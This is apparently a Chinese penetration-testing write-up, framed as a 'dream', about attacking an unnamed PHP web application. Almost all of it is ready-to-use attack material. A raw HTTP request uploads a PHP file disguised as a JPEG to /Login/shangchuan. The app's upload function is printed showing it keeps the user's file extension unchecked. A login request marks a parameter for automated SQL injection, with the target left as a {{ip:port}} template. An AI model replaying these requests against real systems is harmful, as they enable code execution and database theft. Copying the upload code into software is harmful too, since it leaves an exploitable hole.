前言：一场离奇的梦中渗透第一章 梦中的信息收集第二章 梦境中的漏洞复现第三章 梦境突破    前台上传点分析    前台SQL注入挖掘第四章 梦醒时分

POST /Login/shangchuan HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 197Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBP56KuZOdlY4nLGgHost: {{ip:port}}Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-user: ?1------WebKitFormBoundary03rNBzFMIytvpWhyContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/jpeg<?php phpinfo();?>------WebKitFormBoundary03rNBzFMIytvpWhy--

/** * 上传文件函数 *  * 该函数负责处理文件上传过程，根据提供的文件信息和类型，将文件上传到指定目录 * 它首先确定文件的存储路径，并创建路径对应的目录，然后将文件移动到该路径下 *  * @param array $files 文件信息数组，包含文件的临时路径、文件名等信息 * @param string $type 文件类型，目前在函数中未使用，但可能用于未来扩展 *  * @return array|string 返回一个包含文件上传结果的数组，或在上传失败时返回错误信息 */functionupload_file($files,$type){    // 获取文件名    $name = array_keys($files);    $name = $name[0];    // 获取文件扩展名    $ext = extend($files[$name]['name']);    // 定义上传目录，根据当前日期动态创建目录路径    $img_url = "./Uploads/txt/".date('Y-m-d',time()).'/';    // 检查上传目录是否存在，如果不存在则创建    if(!file_exists($img_url)) {       mkdir($img_url,0777,true);       //echo $img_url; die;    }    // 生成唯一文件名，防止重名    $image_name = time().rand(100,999).".".$ext;//图片名字    // 获取文件的临时名字    $tmp = $files[$name]['tmp_name'];//临时名字    // 尝试将文件从临时路径移动到上传目录下    if(move_uploaded_file($tmp,$img_url.$image_name)){        // 如果上传成功，返回文件的相对路径        $arr['re']=ltrim($img_url.$image_name,'.');        $arr['code']=200;        return $arr;        // return ltrim($img_url.$image_name,'.');    }else{        // 如果上传失败，返回错误信息        return 'error';    }}

POST /Login/login_action.html HTTP/1.1Host: {{ip:port}}Connection: keep-aliveContent-Length: 47sec-ch-ua-platform: "Windows"X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=i7fc7spel83kcd4t7afg4fdhl0member_number=123123*&member_pwd=123123123&ty=on